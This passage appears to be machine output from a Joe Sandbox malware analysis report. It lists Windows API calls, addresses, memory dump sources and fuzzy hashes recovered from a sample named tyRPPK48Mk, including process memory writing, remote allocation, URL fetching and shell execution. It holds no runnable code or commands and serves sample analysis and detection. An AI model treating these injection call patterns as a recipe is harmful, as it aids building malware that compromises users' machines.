                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 145871493-4132174516
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00450FBE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00450FD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00450FF7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 943502515-3724388283
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$LabelVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2006950084-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
